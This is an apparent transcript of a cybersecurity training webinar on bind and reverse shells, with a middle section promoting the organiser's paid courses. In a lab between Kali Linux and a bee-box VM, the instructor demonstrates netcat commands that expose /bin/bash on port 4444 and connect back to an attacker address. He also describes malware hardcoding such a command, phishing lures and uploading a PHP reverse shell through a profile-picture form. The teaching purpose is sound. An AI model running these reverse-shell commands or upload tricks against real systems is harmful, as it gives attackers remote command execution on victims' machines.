So before we could go further, so any questions from the previous sessions, what we have done till now? Like you have any kind of an issues with that, or you want to ask anything related to that, please do ask now. So before going further, we can finish it. Okay, great. So, so today we'll be looking at a very interesting concept called bind shell and reverse shell. So what is the end point or end goal of any attack, right? What is the end point or any goal of any attack? For anyone, it is always going to be almost one step lesser is gain shell access to the victim machine. That's the point that is going to be there. And again, so here it depends on the main point is always going to be to getting the root privilege or the what is going to be there, administrator privilege out there. But at least we should be able to run some kind of a command on that part, right? So now a lot of you may not understand what I'm talking about here. So you may be asking what is a shell and what is a root user, right? So first we'll talk about root user. A root user is there in any Linux OS, including your Mac OS, that is going to be there, right? In a Windows machine, this root user is called
Sorry, Karthik.
administrator. Yeah. Can you see my screen?
Yeah, I can see, but are you sharing?
No, one second. Let me reshare. Let me reshare. Are you able to see the screen now?
Yes, yes.
Okay, fine.
Thank you.
No, thank you. So now, for any kind of an attack vector that we are looking at, we need to take any machine and we should be able to run any kind of a command out there, right? And again, we need to be able to run something called as a root user out there. But today we're not going to look into how to gain access as a root user. We might get lucky, and not get lucky also, right? That is going to be the situation out here. But we look at what is the root user. Root user is the user with highest privilege, right? Nothing goes beyond that. The capacity of a root user will be so that it can even change the code of the operating system. Even the kernel code can be modified by the root user. So anything, there's nothing that is hidden from the root user. That's the main goal of it, right? And one step before that, or the second most concept, is to able to execute code on the victim machine, right? So this is the main idea. And this is the main idea what happens in all your malware, right? Whenever you are getting kind of an infected with your malware, it could be that it tells it execute a code, right? It is copying some data out of your system, or it is running some kind of a program on your system, and a lot of things that could go wrong. And for all of this is going to be the ability to execute code on the victim machine. By default, it is not going to happen out there, right? And we should also need to know is that what are the different places where we can execute the code, right? So now before going to that, let's understand what is a shell, right? So what happens is that you may be knowing why is that all the Linux distribution like Red Hat, Ubuntu, right, Kali Linux, and if you take any, there are thousands of Linux operating systems. They all are different in so many different ways, but still they're called as a OS Linux operating system. Why is that? The main reason is that you can tell the brain component, right, of any Linux operating system, that is the Linux kernel, is same for everything, right? So what does this Linux kernel do? The kernel is a component, right? If I want to do let's say 2 plus 2, this has to be sent to the processor, right? The processor does the calculations and send back that information. But processor, I cannot directly communicate with the processor. It becomes a bit difficult. You have to be very, programmatically, the way you're writing machine code should be good there, be able to do that. That is not going to happen for an everyday programming, right? A kernel is a piece of software that interacts in a very raw format with all your hardware in your system for doing a lot of different activities, right? So, but again, this is how this component is common for all the Linux OS, and this is how it is going to work. But the problem is, kernel does not understand your normal commands and everything. So we need a middleman here again for interacting with the kernel called as a shell. So shell is very simple. We might think the command prompt where we enter the commands is shell, right? This whenever we go to the Linux operating system. Or in your Windows also CMD, that is going to be present. Right. So this component where I'm entering the commands, you might think that is the shell. In fact, that is not the shell. That is just a terminal, right? That is just a terminal that interacts with the shell out there. So what shell does is that whenever I give a command, it translates in a way that can be understood by the kernel and sends it to the kernel. And when kernel gets the process done out here and gets the output back, it again translates to a human readable and then display it on the terminal or any other interface that is going to be there, right? If you enter a wrong command, this is going to tell you I've entered a wrong command immediately and going to give it. It will not send that wrong command back to the kernel, right? That is what a shell is supposed to do. So meaning it acts as a middleman and we can tell all the commands are going to have access to that. And what you do with SSH is the same thing. You're directly connecting, let's say this is your server. This is the shell that is present out there. From the remote machine, you're directly connecting to the shell. Here, you're not using the terminal. You're using the SSH client here to connect to the shell and then they send the commands to the shell out there, right? That is why your SSH is called as a SSH starts for secure shell, right? Because it is going to encrypt the communication between the client and the server out there. And now this is where the interesting idea comes into play, right? So SSH is not the only remote shell program, right? There are multiple ways we can do this, and secure shell is most commonly used because it is secure, right? So telnet is also does the same thing as what SSH does. Only thing is that there is no security here. That's the only difference. It's exactly the same approach. What does SSH do? SSH sends connects to the remote server and it will send the command. Right? It will send the command and the command get executed. Right? But why is that we prefer shell SSH compared to any other program? Here, I cannot run commands, CMDs for commands without authentication, right? So whenever I'm connecting, I'm going to send a username and password, right? Only after both of them are matching, I'll be able to send the command and get executes of that. This is a very correct way of going about that. Now, let's say you get infected by a malware. This malware will do the same thing for the hacker, right? So it will open a port, right? It will open a port out here for you and it will allow the attacker to connect and execute commands without authentication, meaning I don't have to run any kind of a program or any username and password is not required. Without running any username and password, that is going to be run out there. And how this malware is going to be executed? You are actually clicking on that link or clicking on that file, double click on that image, thinking it is an image, but in fact that is an malware that is there, that is running in the background. It will open certain things out there, and that process is going to happen, right? By default, there are two types. One is called as a bind shell and reverse shell. Okay, we'll talk about it and why is the reverse shell is very important from any kind of an understanding. If you are a cybersecurity professional, someone who is more involved with, right, someone who is going to be more involved with penetration testing or red teaming security, understanding a reverse shell is important, right? So that's the thing. So the only difference between these two is that in a SSH connection is nothing but a SSH is nothing but a bind shell, right? Correct. So here what is happening? Here the client is initiate the connection and gain access to server. Okay, gain access to server, meaning it can run command in server. Okay, but in a reverse shell, it is the other way around. What happens is that the connection is initiated by client and give access to the client for the server, meaning the server is actually executing the command. This is a bit of a complicated approach. It is a bit confusing. I do agree it takes a bit of a time, but this is how a reverse shell and this is how all your malware is going to work, right? Because when you click on a malware, double click, it connects to a remote server, then it will give access to the remote server to execute commands on itself, right? Because how do you know, right? How do you know that it is a way to connect, right? When I double click on it, how does the hacker know that malware is there in this particular machine or not? He will not know, right? Otherwise, he'll have to do brute forcing and think that is not going to work out. He needs to get a message from the victim telling that, hey, I'm got infected, connect to me, run programs on me, and things like that. That has to be occurred, right? So you might think there's a bit of confusion again out here, right? So let's say this is my desktop and this is my server, okay? And my desktop IP address is 10.10.10.10 and server IP address is 10.10.10.11, right? SSH, when I do SSH root at 10.10.10.10 is meaning it is going to connect here and it is going to execute here, right? This is bind shell. But let's say on the server I'll do, sorry, this is a wrong IP, 11. This is the server IP address. On the server, if I do SSH root at 10.10.10.10, this IP belongs to the desktop, right? It connects to here and it is executing command here. Here, both of them are bind shell only. Don't get confused telling that this icon is showing for a server. So this is a server. This is a desktop. No, right? A lot of people get confused out there, right? For instance, let's say if there are two servers communicating with each other, which is the client here and which is the server here? That happens, right? For instance, if you're booking a ticket on some airlines, some hotel booking on some website, that server is actually connecting to your flight server, flight, company, the airlines company server, and getting the ticket prices. Two servers are communicating, which is a server and which is a client out here, right? So the always see which is on listening mode, which is providing a service, right? That becomes a server, which is asking, that becomes a client. Always make sure that it is not, yes, it may be a server. In this situation, this is the server and this is the client. But in this situation, this becomes the client and this becomes the server out here. Okay, so this is very much important. So meaning the person who is initiating a connection is the client. The person who is receiving the connection is the server out there, right? So the server is always on the listening mode. The port will be open and it is waiting for people to connect to that port, right? So that is how it is going to be there. Right? For instance, when you go for a movie ticket booking, you go to the counter, the person is going to be there for that entire shift duration, is waiting for people to connect. What he's doing is a server out here, because he's serving one kind of a functionality, that is to provide ticket to you when you make a payment for a ticket, right? So that is what is important to understand always. What is a client? It could be a supercomputer, right? It could be, you could be having a supercomputer and it is connecting to a small Raspberry Pi, right? Which is a size of your credit card almost. A supercomputer. If this is requesting and it is receiving, right? Even though there's a huge computational difference, this is the request is generated here. This is the client. And this is providing service. This becomes the server. It never, it is never a computational thing where we'll tell this is a server, this is a client. We'll always looking at the what kind of a server, is it server providing any service or not, right? So now, so initially what happened was, this is how it went, and they came up with something called as a bind shell, right? So what happens in a bind shell? So what happens in a bind shell, you can see here, there is a someone called Alice out here. They want to communicate with Bob. So what is going to happen is that this is going to be used by them, right? So she is going to initiate a connection here and she connects to the Bob's machine and she will execute the commands out there, right? So that is how it is going to work, right? So as I told, in a bind shell, the attacker initiates a connection and then he will do that part. So now what could be the situation for this, right? What could be the situation for this? So what happens is that in a bind shell, let's assume there's a victim machine here. Let's assume it's a desktop only, right? The person clicks on the malware, right? Malware, when it clicks, what it will do is that it will open a port on the victim machine and wait, okay? When someone connects to victim, it will give them shell access, okay? This is what is going to happen out there. This is very much important approach to go about that. Now, all the attacker has to do is he has to connect to the port. So in this case, let's say port number 4444 we will use. As soon as someone connects to this port, he'll be able to run the command out there. For instance, ID I can run. Okay, so that is how the bind shell is going to work. So for us to emulate this process, right, it is not a good idea to look at from an, how to create malware and thing. It is out of the scope. It is possible. Kali Linux, if you have, if you know, if you look around, you can create your own malware, but it is not going to be, it's not a good idea, but you need to have an idea how it works. For us to emulate this, we are going to use a tool called netcat. In the command line, it is going to be called as an NC, right? So we will set up a netcat here and it will make him listen in a particular port. And then we will run the hacker's perspective and make him try to connect to that port and see how whether we'll have access to that machine or not. Okay, so let's look at that perspective. So it might look okay. This is what happens if that is what is happening out there, right? We thought malware will do something and all. No, it is just a simple program that is going to do that activity out there, right? And nowadays, your antivirus software will have the capacity, will always have the capacity to identify this kind of a malware and work on it part. Right? Let's do one thing to show you. One second, cd slash. Yes, it is there. So let me open this folder. Your Windows Defender also will be able to know that this is a virus part for this part, right? It is not NC is not a virus, but it has the same option to create a shell without having any authentication. So see here, my antivirus is telling it is a potential unwanted program. Are you sure you want to do that? So this is what it will flag it as a virus for that. So even though it is not a virus, but it has the potential to execute commands that could be there. That is going to be, it's not going to be a good idea to have it that part, right? So that's how it works. So now for the experimentation part, for the hacker machine, I'm going to use a Kali Linux out here. And for the victim machine, I'm going to use the bbox machine. Please note bbox as netcat installed by default. So I'm not going to worry about that. The main goal of anything is that how do I push a malware right into the victim machine and how to enable that malware. We're not covering it. So once that malware is enabled, what is going to happen? That is what we are going to cover out here. Right. So now in netcat command has multiple options. One is that NC, the lab option is -L. L stands for listen. What it will do is that I will specify a port number. It will listen to this port number. It will open this port number and it will listen for someone to connect to that part. Right? So that is what is going to happen out there. I'm going to give -/e bin/bash. Whoever connects to this port, they will have access to this program file that is been given out there. Right? Bash is nothing but the shell. The file they're having access to is the shell. So I should be able to interact with that shell using this command out there. Right? Multiple things. nc-nlvp. N stands for no DNS, listening, the port I'm connecting, and V stands for verbose, meaning it is going to be a bit more information is displayed on the screen. So now let's go to bweb machine out here, bbox. I may be telling a lot of times bbox right? Or BWAP machine, both are exactly the same, right? For web application part, there's something called as BPAP, but BBox is the Linux. Both are same out here. So now let me close this. So we're not worried about that. Just a second, guys. Okay. So now, as I told, NC command is there, right? It's working properly. NC is a very versatile command. It is also called as Swiss Army knife command. So it does a lot. It can do port scanning. It can do a lot of other things. There is actually a book written just for working out, understanding how an NC command works. But we are not going to go much deep into that. We are going to focus today only on the reverse shell and bind shell perspective of it. So now the BBox machine is the server machine. Please note that. Please always have this is the machine server here, and this is the victim that is playing out there, right? Or the target part of that. It is running in the server mode in this instance. Okay. So how do we run it in an instance mode, server mode? It's very simple. Always make sure the L is there for the server mode, NLVP, that is going to be there, and then going to specify the port number. This is as simple. Your malware does not have to run any complex kind of a thing. Once you double click on that malware, something like this is going to get executed, right? It is not going to be that complicated. So now, before going further, let's understand what is the IP address. So here the IP address is going to be 192.168.178.146. For this IP address, I'm going to bind port number 4444. So any client connecting to this IP address on this particular port will be able to get this done now. So let's come back. Clear. NC-NLVP 4444-E/bin/bash, right? So press enter. So this is listening on the port number 4444, right? What was the IP address? 146. So let's go to Kali Linux. Let's understand whether both of them are in the same network or not. Let me give ifconfig. Yes. So 192.168, that is that. So connecting to the remote machine is very simple. Please note NC is installed in both by default, in both the machines. There is an NC command in Windows also, in Kali Linux also. NC-NV, right? Then I'm going to give 192.168.178.146, port number 4444, and press I, right? So now it is telling that it is connected to that machine out there. And if you come to here, it is telling the remote machine is connected to my machine out here, right? By default in my Kali Linux terminal, by default in Kali Linux terminal, if I give ID, it will give me that you're logged in as root user, because this is the user I'm logged in as, right? And again, you can give host name, then it is going to give it is logged in as Kali Linux. But in the machine which we established in session now, if you give ID, it is going to give here the B user and all the other things that is connected. Why? The username here is BEE is the username, and that is what I'm connected to. And now you could see I could run commands out here. right? I could run commands out here. I can give who am I, right? It is telling me that you can run any commands and things like that. For instance, I can do mkdir 1, and I see here you give, let's say, let me open a new tab and give ls. You can see there's a folder got created here as 1. If I give mkdir2 again, this is going to create one folder out. Refresh the command. See, previously there was no 2, things like that. Think about what are the different things that it will be able to execute out here, right? Any commands that I'm going to run will be executed out there, right? But again, there is going to be limitations here. For instance, very important command we usually run is cat/etc passwd, right? So this is giving me a list of all users and things like that. But since I'm not a root user out here, I can say cat etc shadow file. I will not be able to execute that because see here error is there. It's showing error in this mission, permission denied, right? Because I'm not a root user, I will not be able to access for that. So it is important, right, for us to get a malware. If the administrator clicks on the malware and then gets infected, I'm going to have a root access. If a normal user clicks on the malware and gets infected, I'm going to have access to the normal user. So there is a limitation, right? But there is a limitation, but I can work on that stuff out there. Correct, right? So now, any questions till now? Any questions till now? Because this is when we going to reverse shell, it is a bit different. We're doing the same commands. I'm just changing the where I'm executing what command out there. The -e option that I'm specifying here, I'm telling where I'm executing that. That's the only difference that is going to happen out here, right? But there is a certain variations why it is done in process for that. So any questions till now what has been done? Any query?
Now, quick note. Uh, I think there are a few students they are join first time in this session. So please remember this is a series of session we do. So in our this free workshop or internship program is a consist of 8 session, and today is the 7th session. We do have one more left. So we have started from very scratch to make that thing is more create a high level story for cybersecurity and DevSecOps. If you are going to join in this position, or if you have a dream to create your career on this particular domain, so what kind of knowledge you need to require, what will be your day-to-day activities, what kind of hands-on you need to do. So that is the test bed kind of thing we are trying to create through our this free workshop. Though it is depth is not very much because we have only 8 weeks or 8 weekend every Saturday to conduct. But because that for depth our main job ready training is there, but for to give you the taste before fire or invest your 7 weeks or 6 weeks daily Monday to Friday 2 hours like 100 hours for the training, you should prepare yourself that what kind of things you are going to face, right? Fortune, we could not hear you. I can see your is blinking, but we cannot. It is not audible. Guys,
You can put your question in
yeah.
the chat, Fortune. You can put your question in the chat.
Now, guys, many of you are our main students. Some of our CPP student. So, uh, and many who joined firstly with Kalkey's this free internship program. So it is an interactive session. Our goal to create an awareness on DevOps and DevSecOps for this operation one, operation domain. We are going to start our another domain free workshop, that is data science with AI and data analytics. I think in the month of Jan, third weeks. So that will be another 4 or 5 weeks long. But it is an interactive session. Whatever question you have, feel free to ask. No, and you have question, you want to know. That's the reason you have joined. So don't hesitate while you are asking.
Yes. Yep. And again, today's topic is bit of an advanced level topic. It's if you're new and you're not understanding, don't worry. You can ask a lot of questions here, but it is like, as I'm telling, it is something what would happen in scenario, what we are looking at. And having this understanding is important from an interview process as well. So they will ask you questions about reversal and bind shell and things. So that is one of the reasons why we are covering this particular topic in the webinar today.
Any question, guys?
Someone is telling where we can find the different session coming up, so we add it to the calendar. Is there a website? Mary, I think we do. Manuel, can you answer that?
Yeah, we do have a website, and here if you register on the, so in the website we do have two types of training. One is free, which you are right now joined, and we do have a paid one. Now both have, you can do the registration. Once you do the registration, inside your dashboard, you will find all the video recording, meeting link, and the day-to-day topics. The website is just give me let me type it. It is kalkey.com/training. In this website, you can find all of our free courses, paid courses. Even once you join the interview questionnaires, exams, few of the dumps, and thirdly, your resume preparation, everything you can do. Any other question?
Okay.
So one question I last couple of days, which I have faced lots of students asking uh, through call, chat, that they are non-IT students. Can they get a cybersecurity job, or is it possible to get a cybersecurity job after the course? So my answer was that joining the cybersecurity class of ours is become a little bit advanced. If you have non at all an IT background, it will always advisable that if you complete our DevOps training, then move to DevSecOps training. The
Correct.
reason behind, in the DevOps training, you are going to learn the infrastructure of software development lifecycle and how to build it, how to maintain it. Once you know the every corner of this infrastructure of a company, or the IT world, then you know how to then you can learn how to secure it. So trust me, so far now 100 students, they are not at all IT engineers. They are used to used to work in delivery industry, Ubering, hospital industry, hotel industry, but because of their dedication and not on a willing not to give up, uh, eventually they successfully land on a job, like hundreds
Yes.
through our CPP program and thousands to our training. Now, Mr. Karthik, would you like to add some, if you want to correct something?
No, no, it's absolutely right. Actually, cybersecurity is one of the fields where your education background or your experience uh, is where they actually compromise if you have the right set of the knowledge out there, right? I've seen a lot of people who have got placed in cybersecurity, very good job offerings, very good salary, even though they even might have not completed their high school also, right? Due to some family reasons, they dropped out of the school and been able to do, or not being in that particular field. If they've been working on some other, I've seen people who are working in airlines industries, working in the stewardship and things like that. They are able to get, uh, they are able to get was placed in good job openings out there, because there is a significant lack of skilled cybersecurity professionals out there, right? So that is one of the reasons, even in the there is a recession going on, not many people are getting hired, but you will see a consistency in number of job opening for cybersecurity is basically because of that. They are not filling the bare minimum vacancies also for that particular part. So it is, if you have a skill set that is required for it, it is, I have not seen many people not getting placed after having skill set in cybersecurity. In other profiles, that is there, that's very much true. But if you're coming in from non-IT background, or having less IT understanding about IT, or little bit understanding, I would definitely suggest to go do the DevOps part, understand what is the infrastructure, what is that you have to protect, right? Then you come to the cybersecurity and actually protect that infrastructure, right? How do you secure that infrastructure? That is very much important. So that would be a better way to go, is what I suggest.
Exactly. Now I can, talk about a whole day about why this DevSecOps and cybersecurity is very important for the newcomers. If you I am assuming everyone having a LinkedIn profile, just go to your LinkedIn, search a job, DevSecOps position, and even you can open for remote, or search for remote, or on site, whatever. And if you try to create the search query, you will find that there are like a thousands job, and you just need to check how many people applied for that job, and how many weeks this job is open. You'll find plenty jobs is open for last 6 to 7 weeks, and they are having less than 50 or 60 or 30, or maybe less than 100 applicant applied. Compared to other domain, if you find any development or business or scrum master, or project manager, or any data analytics position, even a 1 day old job, maybe in within 4 or 5 hours, you will find more than 100 applicant applied. So what we can learn from there? So the thing is, in cybersecurity and DevSecOps, in market there is a huge demand, but not at all a very good skilled professionals available.
Yes.
So it is much more easier for us to place our student through our CPP program or our training, because once we know that once they learn this skill set, uh, they can eventually land on a job. And last year the US job market was not very good, not very promising. But still, some of our student, I can take like a number of names who successfully land on a their dream job in multiple positions, not only one. Some people, they secure two positions through our consulting firm. So, and they have had a not at all a IT background. Only thing you need to require, never give up kind of attitude, and the whole training is 80 to 95% is hands-on. You need to cope up with those training, because there is lots and lots of information will flow, and our training is not about the time sensitive, like we have to complete the training in the 6 weeks, not at all. Until unless our students are ready for that particular job role, if they have a question, we will try to continue the training until unless they are become fully ready for that particular job role. And that's the reason most of our training for 6 weeks training is sometimes extended to 7 weeks. So that is the commitment from our end, but you also need to show your commitment that every day, whatever the training is done, that you need to watch the recording of the classes, you need to practice the labs daily wise. Then you need to come up the question the next day. You need to follow up with your trainer to understand where was the you stuck, or your shortcomings, then move forward for the next steps, right? Any
At the
question,
same
guys?
time,
Yeah.
you will see a lot of the job profiles get filled up quite easily. Other developer, other things, a couple of days they would remove the job posting. But in cybersecurity, you'll see that they keep on reposting out there, even that though they might usually take on an average about 90 days or more to fill up a single position for them, if they're lucky. Because by the time they finish that and someone else would have offered them a better payroll and they would have jumped out there. It's quite difficult for companies to fill cybersecurity roles. That's why you see the jobs are posted continuously again and again for the same thing. Right, man?
Yes, exactly. Any
So any
question?
more? It
Yeah,
might
hello.
look, yeah, tell me. Yeah.
Yeah. So what do you have for us with Canada people? What like offer for Canada people? Because I think some of your students is in Canada.
Yeah, we
Hello?
do have some students from Canada.
Okay. Because is tech here is somehow I don't know. I don't know, maybe because US is like a big like a place to get a tech job, but I don't think Canada sometimes it's
See,
easy to
if
get.
true, every country they have their own job market, and they have it based on the country. The job market size varies. But regardless of the size of the job market, the domain specific opening is the ratio is more or less same in every country. Now in your Canada, if there are like a 10 positions for cyber security, uh, it will be much more difficult for the employer to fill. Now in our Canada, we don't have any consulting firm. US, we do have two. Now, but we do have a good number of students from Canada, and at the end of the training, they successfully land on their job, because it is not about the job market. It is all about the which domain or which skill set you are applying. Make sense?
Yeah. So so what is applicable to here to our domain here in Canada? Because I don't want to jumble into any like any. I want to go for a like to learn something that is I can easily get a job in Canada
See,
because I
if
stay
you
in
want to
Canada.
get the job easily, then your learning will not be easy. You need to
Oh,
understand. So if you so
oh,
because this job, IT job, why people are trying to
yeah,
get a IT job? Because it is high paying job, it is a prestigious job. Cybersecurity is a kind of a top of or cream of this kind of IT roles. Now the issue is this particularly DevSecOps position is very new in the job market, and it is like a conjunctions of two different domain knowledge you need to have. You need to good with uh, operation or DevOps. In the same time, you also need to have a hands-on experience on the cybersecurity, and that is the reason the most of the company they are finding difficulties to fill up their position. Now, is it a hard to learn? I would say no, because our training is designed in such a way. Our 80 to 85% of students who have successfully landed on a job, they never had a IT background, even if they have from a different domain, especially on many like a project manager, scrum master domain, not at all a hands-on IT engineers. But then how they have overcome that hindrance? Because in DevSecOps, in the market right now, there are two positions which is very trendy or high demanding. So this is called high demand skills. One is cybersecurity DevSecOps, one is machine learning with AI. And why it is very easy for us to place our student? Because if you throw a stone in a group of IT people, if you hit somebody heads, either he's a developer or he's from a like either business developer, normal developer, or he's from a testing background. But you need to take a help from a magnifying glass to find a cybersecurity or a specialist or DevSecOps engineer from a 100 people crowd. So this skill set is so rare. The reason behind why it is rare, it is very hard to learn. No, it is very new. And the second thing is you need to know two different skill set. One is DevOps, one is cybersecurity. Then only you can become a DevSecOps. And here is the thing: that every success story is hidden on this particular word, DevSecOps, because you need to know DevOps at the same time and the cybersecurity. And only 30 or 40% company have so far implemented on DevOps on their software development lifecycle. DevOps demand is in full swing, but still DevOps came in the full-fledged in the market from 2016. And DevSecOps same time, but only it is growing and growing and growing, and it will grow like 10 times bigger because AI is also creating lots and lots of security issue in the company. So it is also come under the same umbrella, GRC umbrella. Did I give you the answer?
Yeah. Thank you.
So it is not about the job market. It is about the jobs, which skill set you are preparing. If you prepare you for a job, Scrum Master, Project Manager, or testing or development domain, it may take you 5 years to land on a job. If you prepare yourself for AI or DevSecOps position, it will take you 6 months because the competition you nullified. Now AI's learning curve is stiffer than cybersecurity because for the AI you need to know Python at least as a coding language, mathematics, and with this two you also need to learn predictive analysis, machine learning, deep analysis, deep learning. So there are lots of fundamental and theoretical thing you need to know. But cybersecurity is lesser stiffer than AI because here is no coding is involved so far, all about commands. Any other question? Yeah. Okay, then I don't think they have any other question.
Sure. Let's continue. So now what happens is that this bind shell is not going to work in real time, right? For multiple reasons. It could work. The main reason is most of our clients are sitting behind a firewall. If you know, one of the basic models of firewall is that it will allow the connection going from inside to outside, and it will deny the connection from outside to inside by default, right? So if a hacker wants to connect to the victim machine out here and execute the code, he has to go via the firewall itself, and he is going to be blocked, right? And assume that this is going to, the client or the victim is shielded, even though it is pressing on the malware, it is open, the port is open out here, right? It will tell I am on the listening mode. But the hacker here is not able to connect to this part. Why? The firewall is going to take care of that part because firewall is not going to allow you to gain access for that, right? That becomes a bit of an issue. And some cases you might tell, okay, in my house environment, one is firewall, right? And second part is going to be in your house. Let's say you're connected to the Wi-Fi router, right? Your Wi-Fi router is there. The IP address, if you see in your system, it is going to be 192.168.178, right? Something like that it will be there, right? Or it will not be, sorry, 171.10 or something like that will be there for you. This is a private IP address, right? Your router is connected to the internet. Here it will have a public IP. Then the hacker is connected to that, right? Public IP, if you know networking, public IP, your servers and everything will have public IP. It can be connected from anywhere, right? From anywhere in the internet, in the entire internet. But whereas a private IP is not routable, I cannot connect. Only devices which are in your home network will be able to talk to each other. But if you want to talk to a neighbor device via your IP address only, it will not do that part, right? Here something is going to happen, something called as a NAT technology, is the network address translation. For every packet going out, it is going to change the IP address for that device. Your edge device is going to take care of that part, right? So now this is the IP address, and see the hacker is using a public IP 11.11.11.15. Let's assume this is a public IP address. Okay. There is a predefined private IP addresses that are there. For instance, anything starting from 192.168, 10.0.0. Any address starting with 10, and any address starting with 192.168, or any address starting from 172.16, right? And 172, and one more range is there, right? This is basically given out for private IP. It will not be routed beyond your own network. That is the major issue that we face out here. So what happens is that if I try to do ping or try to connect to this 192.1.10 here, your ISP is the internet service provider. He himself will drop the packet telling that this is a private IP address. I don't know the route to that. It is not supposed to be routed and things like that. So now it again here, big one reason is firewall. Even if that is in a public IP address, firewall will block, telling that it is coming from outside. I will not allow you this connection. Someone is trying to connect, I will not allow for that. And second reason is network address translation, because your IP address that you connected is a private IP, and I do not know how to do this process. So now it becomes a scenario. How do I overcome this situation? And hackers have to think, right? They want to compromise it, and they want to see how it is going to do this part. So now they understand one thing. See here, this is your victim machine. Is having in a private IP address. It's connected to the firewall. Firewall will do natting also, right? It is doing natting also. And the firewall is connected to the internet. And here it is there. My communication from going inside is blocked for many reasons. One is firewall and things. And here, the IP address for the hacker is a public IP, meaning if I do ping 11.11.11.15, this is going to allow for that because there's a public address. Anyone in the internet can connect to this part. That is going to happen out there. So now they thought, can we make the client connect to the server and give access to its command line, right? To its command line. Is it possible for us to do that part? And they figured out a way for that particular. So now see here, this is still a server Why the hacker is still considered server? Because he is listening, right? And this is called a client because it is going to connect for that. What they did was very simple. They initiated the connection. This is going to wait NC-NLVP 444. It is going to do this, and it is going to wait to connect. Or it is waiting for connections to connect on that, right? So now here I'm going to NC-NV. I'm going to give IP address for that 11.11.11.15, and I'm going to tell port number is 4444. If you remember, I give the -E option in the server mode previously. This time I'm running it in the client mode, right? In the client side, I'm going to do that part. Now, firewall is going to allow all the communication from going inside to the outside. Who is initiating this connection? Client is initiating this connection. So this is going to be allowed out there. Sorry. Again, in the NAT, the address translation is going to happen in the firewall. So the communication is going to be easy as well. Yep. Just give me a second. Let me have some water. Not only that, now the attacker does not need to know IP of victim also, right? Previously, I needed to know the IP of the victim for me to be able to connect to that and then give access for that particular part, because here this victim was working as the server mode, the attacker was working as the client mode previously out there. So now that is not the case. He'll be able to connect. Anyone who's clicking on that malware will have that server IP address, and then he's going to go and get that access out there, right? So that is what is important. In fact, we will get updates, right? We'll get regular updates on blocked IP addresses. Okay, so meaning there may be a lot of attackers or malware or things. They're using some kind of a server to collect victims, right? To do that part. So what they will do is that they will send out a block IP list out there that is going to be updated to your firewall, where this IP address belongs to hackers, right? This gets updated quite often, and these IP addresses will be blacklisted IP addresses, and then it is going to make sure that by default the firewall is going to block even if the connection is going to go out there. Okay, so let's see how it works. It's very simple. Now the victim is running the client command, and the Kali Linux is running the server mode. Kali is going to do -NLVP 4444, right? And here I'm going to do NC-NV 192.168.178.139, I think so, right? 4444 /bin/bash, right? So let's try to run this process and check it out, whether will we have access to that or not. This is a very critical understanding is required here. Okay, let me close this connection first. The previous connection is closed. Let me go to home directory here. So now first and foremost is NC-. I'm going to run the server mode in the Kali Linux, and it is listening on it. So what is the IP address belonging to Kali Linux? Is 132, right? So I'm going to give NC-NV 192.168.178.132 4444, right? And I'm going to give -E /bin/bash. Right? I don't execute commands here anymore. I'm going to execute here. See, it is connected to the host 146 and same thing is working, right? ID is going to work. Who am I is going to work out here. I can do ls command, see the list of temp folders that are available out there. All those things is going to work here, exactly the same thing. But only thing is that the victim, the attacker is not connecting to the victim. Here what is happening is in reversal, the target initiates the connection. It is looking out where is the hacker system. It is searching the hacker system on the internet. Then it will connect to the hacker system and then it will give its shell access to the hacker out there, right? And that is what your, crypto ransomware and how things are working is exactly the same thing. The ransomware is able to do what? It connects, right? It encrypts, it attacks your system, takes the file, encrypts it, because for encryption, some kind of a code needs to be executed. So there's a command execution possibility. Without shell, that cannot be done. So it encrypts all the things and then it will send the key to the hacker somewhere in that. How does it know where to send, which is the hacker IP address? That will be hard coded into the malware of the, right? That will be hard coded into the malware, and that is how it's going to work. Anything that is going to deal with managing and doing this process will happen in this particular part, right? So as we said, in reverse, the target is initiating the connection out here. In a bind shell, the attacker is going to initiate connection. Yeah, please, you ask the question.
Yes, please. In what situation would a target initiate a connection? Like, what would make a target want to initiate a connection that an attacker can take advantage of? Is it like the
Whenever,
state
yeah,
of
it's
vulnerability?
yes. So for instance, let's say there are multiple. This is, even though bind shell is there, what we talk about, you know, the attacker initiating the connection. Today in attack vectors, you don't see at all bind shell used by the attackers, right? They'll always go in any instance where your system is compromised. It will always be a reverse shell, right? So what we'll tell a simple scenario out here. Okay, I'm an hacker. I'm going to take, let's say I will take I've taken a stolen credit card information. I'll take an AWS machine. I will set up a server out in the AWS. Then what I will do is that I will open port number 4444, right? For command shell out there, waiting and listening for that the shell process out there. Now, what I'm going to do is that, let's say I'm sending a phishing mail to everyone, telling that, it could be like phishing mail is going to be that, Xmas offer is there, get a discount coupon and things and all those things. What people will do is they will click on it, right? Most, according to the study, which kind of an attack works better or the phishing mail that works better is cat pictures, right? So they'll click for more cat pictures out there. It will actually, what happens is that this is going to create a malware out here, right? And let's say these two people will not click on that image. That is not going to happen. But system A will click on that link. And when they click on that link, what is going to happen? The malware or the virus. Malware is nothing but virus only, different things that gets infected here. And when this gets it, it actually runs a code. What is that hacker happens out there? When we tell malware is infected or virus, it is there. It is doing some kind of an activity out there, right? Multiple things. Certain viruses will delete files because it is able to run the command, say rm, it is going to run the file name that is there, that could be the simple code. But here it has been hard coded. It will run nc-nv 11.11.11.11 4444 and the /e option will be there. This is going to be hard coded into that malware. When you double click on it, this is going to work. There are multiple ways when you can do this activity out there, right? So in some cases, it like a lot of people will do is calculator.exe is there, right? In your machine. This particular app is there. It is quite easy to create a fake app like this, right? It is quite easy to create a fake app like this. When I think when your viruses get infected out there, what it will do is that it will take this icon and put it on your desktop. Okay? So you want to calculate, what you're going to do. You're going to double click this calculator icon and it will open the calculator. It's not that it's not, it will work, but along with opening, it will run the command as well, the malware command that is be executed out there. Right? So any instance, this is what it is. Not that is there any specific instance. Most of the times when we are compromising, this is how it goes. Right? Think about there is something called as a web shell also, right? Your PHP code in your web server, right, is a server-side code out there. Meaning every time you're going to execute, let's say that's a student web server, right? A web server is used for student information, right? Student info. So whenever I request, I'm going to get, let's say you're a teacher, you want to see a list of names of students in your class. You're going to listen in your system, that web browser, it will open up. Okay. What is happening in the background if it is a PHP based application? The PHP is getting executed. It connects to the database and it fetches the information. It creates that file and gets the data is pushed to the browser. Now I can do is what I've done when we're testing, like when we tell customer there's a vulnerability, we can compromise it. They'll give us a proof of concept that can be compromised and what is the intent. So what I do sometimes is that there will be something called as a profile picture. But if you take anything, right, any account, anything, if you're going into Facebook, you have a profile picture. In your company organization, there are going to be profile information and things out there. They'll ask you to upload this, right? There are many cases. Instead of doing that NC command, I can also have a PHP do a reverse shell also. Instead of uploading a profile picture, I'm going to upload the PHP reverse shell, right? So now I will request this PHP reverse shell. This will execute the code and I will have access to the 